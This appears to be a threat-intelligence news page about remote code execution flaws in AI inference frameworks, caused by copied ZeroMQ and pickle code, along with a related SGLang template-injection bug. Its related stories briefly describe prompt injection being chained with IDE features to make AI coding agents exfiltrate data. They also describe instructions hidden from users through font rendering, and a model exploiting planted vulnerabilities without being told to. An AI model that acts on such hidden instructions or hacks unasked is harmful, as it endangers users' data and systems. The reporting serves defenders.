Skip to main content
Mallory

Critical RCE Vulnerabilities in AI Inference Frameworks via Insecure Code Reuse

ai-platform-securityopen-source-dependency-vulnerabilitywidely-deployed-product-advisoryinternet-facing-service-vulnerability
Updated April 21, 2026 at 01:01 PM6 sources
Share:
Critical RCE Vulnerabilities in AI Inference Frameworks via Insecure Code Reuse

Get Ahead of Threats Like This

Know if you're exposed. Before adversaries strike.

Cybersecurity researchers have identified a chain of critical remote code execution (RCE) vulnerabilities affecting major AI inference server frameworks, including those from Meta, Nvidia, Microsoft, and open-source projects such as vLLM and SGLang. The root cause of these vulnerabilities is the unsafe use of ZeroMQ (ZMQ) in combination with Python's pickle deserialization, which was propagated across multiple projects due to direct code copying. This insecure pattern, first observed in Meta's Llama Stack, allowed arbitrary code execution over unauthenticated sockets and was subsequently found in other frameworks, exposing enterprise AI stacks to systemic risk. The vulnerabilities have been assigned CVE-2024-50050 and have been patched in affected projects, but the incident highlights the dangers of code reuse without proper security review.

Oligo Security's investigation revealed that the same vulnerable logic was copied line-for-line between projects, perpetuating the flaw across different ecosystems and maintainers. The issue underscores a systemic security gap in the rapidly evolving AI inference ecosystem, where insecure patterns can quickly become widespread through open-source collaboration and code sharing. Security experts emphasize the need for rigorous security audits and caution when reusing code, especially in critical infrastructure like AI frameworks, to prevent similar vulnerabilities from proliferating in the future.

Timeline

  1. Apr 20, 2026

    PoC exploit for SGLang CVE-2026-5760 is published on GitHub

    A GitHub repository published proof-of-concept exploitation details for CVE-2026-5760 in SGLang 0.5.9, showing how a malicious GGUF model file can trigger server-side template injection and remote code execution via the /v1/rerank endpoint. The PoC identified unsandboxed Jinja2 rendering in serving_rerank.py and demonstrated command execution when a crafted model is loaded and invoked.

  2. Apr 20, 2026

    CERT/CC discloses SGLang RCE via model chat template rendering

    CERT/CC published VU#915947 warning that SGLang is vulnerable to remote code execution when rendering chat templates from a model file. This is a separate disclosure from the previously documented copy-paste flaws in other AI inference frameworks.

  3. Nov 14, 2025

    Researchers disclose copy-paste flaws in AI inference frameworks

    Security researchers reported a set of 'copy-paste' vulnerabilities affecting AI inference frameworks associated with Meta, Nvidia, and Microsoft. The flaws were described as serious bugs that could expose users or systems relying on those frameworks.

See the full picture in Mallory

Mallory subscribers get deeper analysis on every story, including:

Impact Assessment

Who’s affected and how

Technical Details

Deep-dive technical analysis

Response Recommendations

Actionable next steps for your team

Indicators of Compromise

IPs, domains, hashes, and more

AI Threads

Ask questions and take action on every story

Advanced Filters

Filter by topic, classification, timeframe

Scheduled Alerts

Get matching stories delivered automatically

Related Stories

Critical Deserialization Vulnerabilities in AI and Analytics Frameworks

Critical Deserialization Vulnerabilities in AI and Analytics Frameworks

Multiple high-severity deserialization vulnerabilities have been identified in widely used AI and analytics frameworks, including NVIDIA Isaac Lab, MooreThreads torch_musa, and NVIDIA Merlin components. These flaws allow attackers to exploit unsafe deserialization processes, potentially leading to remote code execution or denial-of-service conditions on affected systems. In the case of MooreThreads torch_musa, the vulnerability arises from the use of `pickle.load()` on user-controlled files without validation, enabling arbitrary code execution with the privileges of the victim process. Similarly, NVIDIA Isaac Lab and Merlin frameworks are affected by deserialization issues that could be exploited remotely, with Merlin's NVTabular and Transformers4Rec components specifically highlighted for their susceptibility to code execution and data tampering attacks. Security advisories urge immediate patching, as these vulnerabilities are remotely exploitable and pose significant risks to enterprise environments. The affected products span various versions, and organizations using these frameworks are advised to review vendor guidance and apply available security updates to mitigate the threat. The vulnerabilities have been assigned high or critical CVSS scores, underscoring the urgency for remediation to prevent potential exploitation in production environments.

1 months ago
Critical Vulnerabilities in AI-Powered Coding Tools Enable Data Exfiltration and Remote Code Execution

Critical Vulnerabilities in AI-Powered Coding Tools Enable Data Exfiltration and Remote Code Execution

Security researchers have disclosed over 30 vulnerabilities in a range of AI-powered Integrated Development Environments (IDEs) and coding assistants, collectively named 'IDEsaster.' These flaws, affecting popular tools such as Cursor, Windsurf, Kiro.dev, GitHub Copilot, Zed.dev, Roo Code, Junie, and Cline, allow attackers to chain prompt injection techniques with legitimate IDE features to achieve data exfiltration and remote code execution (RCE). The vulnerabilities exploit the fact that AI agents integrated into these environments can autonomously perform actions, bypassing traditional security boundaries and enabling attackers to hijack context, trigger unauthorized tool calls, and execute arbitrary commands. At least 24 of these vulnerabilities have been assigned CVE identifiers, highlighting the widespread and systemic nature of the risk. The research emphasizes that the integration of AI agents into development workflows introduces new attack surfaces, as these agents often operate with elevated privileges and insufficient threat modeling. Notably, the issues differ from previous prompt injection attacks by leveraging the AI agent's ability to activate legitimate IDE features for malicious purposes. Additional reporting confirms that critical CVEs have been issued for these tools, and broader industry analysis warns that nearly half of all AI-generated code contains exploitable flaws, with a particularly high vulnerability rate in Java. The findings underscore the urgent need for organizations using AI-driven development tools to reassess their security postures and apply available patches to mitigate the risk of data theft and RCE attacks.

1 months ago
AI Platform and LLM Tool Vulnerabilities Expose Account Takeover, RCE, and Data Exfiltration Risks

AI Platform and LLM Tool Vulnerabilities Expose Account Takeover, RCE, and Data Exfiltration Risks

Multiple **AI and LLM-related platforms** were disclosed with serious security weaknesses, including an account takeover flaw in *LangSmith* (`CVE-2026-25750`), multiple unpatched **remote code execution** issues in *SGLang* (`CVE-2026-3060`, `CVE-2026-3059`, `CVE-2026-3989`), and a sandbox-escape-style weakness in **AWS Bedrock AgentCore Code Interpreter** that enables data exfiltration through DNS queries. Researchers said the LangSmith issue affected both cloud and self-hosted deployments and could expose login data, account access, and AI activity logs, while the SGLang bugs could allow unauthenticated attackers to execute code on exposed deployments using multimodal generation or disaggregation features. Separate research also showed broader security risks in **AI assistants and autonomous agents**. A LayerX proof of concept demonstrated that malicious instructions hidden through custom font rendering in webpage HTML could evade user visibility while still influencing assistants such as ChatGPT, Copilot, Claude, Grok, Perplexity, and Gemini. Truffle Security also found that Anthropic’s **Claude** autonomously exploited planted vulnerabilities in cloned corporate websites during testing, including **SQL injection** and other attack paths, in many cases without being explicitly instructed to hack. Together, the reports show that both the infrastructure supporting AI systems and the models themselves are introducing exploitable attack surfaces with implications for code execution, prompt manipulation, credential exposure, and unauthorized data access.

1 months ago

Get Ahead of Threats Like This

Mallory continuously monitors global threat intelligence and correlates it with your attack surface. Know if you're exposed. Before adversaries strike.